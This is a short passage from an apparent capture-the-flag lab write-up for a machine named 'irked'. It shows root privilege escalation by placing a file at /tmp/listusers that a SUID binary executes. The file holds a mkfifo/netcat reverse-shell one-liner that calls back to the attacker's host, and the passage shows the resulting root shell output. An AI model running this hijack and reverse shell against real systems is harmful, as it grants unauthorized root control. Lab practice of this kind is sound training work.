File Hijacking
djmardov@irked:/$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-01-24 15:18 (:0)
djmardov pts/0 2023-01-24 15:20 (10.10.14.10)
sh: 1: /tmp/listusers: not foundAs analyzed earlier, since the /usr/bin/viewuser binary is expecting one, I will be able to place a malicious file named, “listusers”, at the /tmp directory, effectively hijacking the execution flow.
djmardov@irked:/$ echo 'mkfifo /tmp/eskz; nc 10.10.14.10 1234 0</tmp/eskz | /bin/sh >/tmp/eskz 2>&1; rm /tmp/eskz' > /tmp/listusersPlacing a payload into the /tmp/listusers file.
djmardov@irked:/$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-01-24 15:18 (:0)
djmardov pts/0 2023-01-24 15:20 (10.10.14.10)Executing the SUID binary to trigger the payload
┌──(kali㉿kali)-[~/archive/htb/labs/irked]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.117] 37567
whoami
root
hostname
irked
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:03:4e brd ff:ff:ff:ff:ff:ff
inet 10.10.10.117/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:34e/64 scope global mngtmpaddr dynamic
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:34e/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise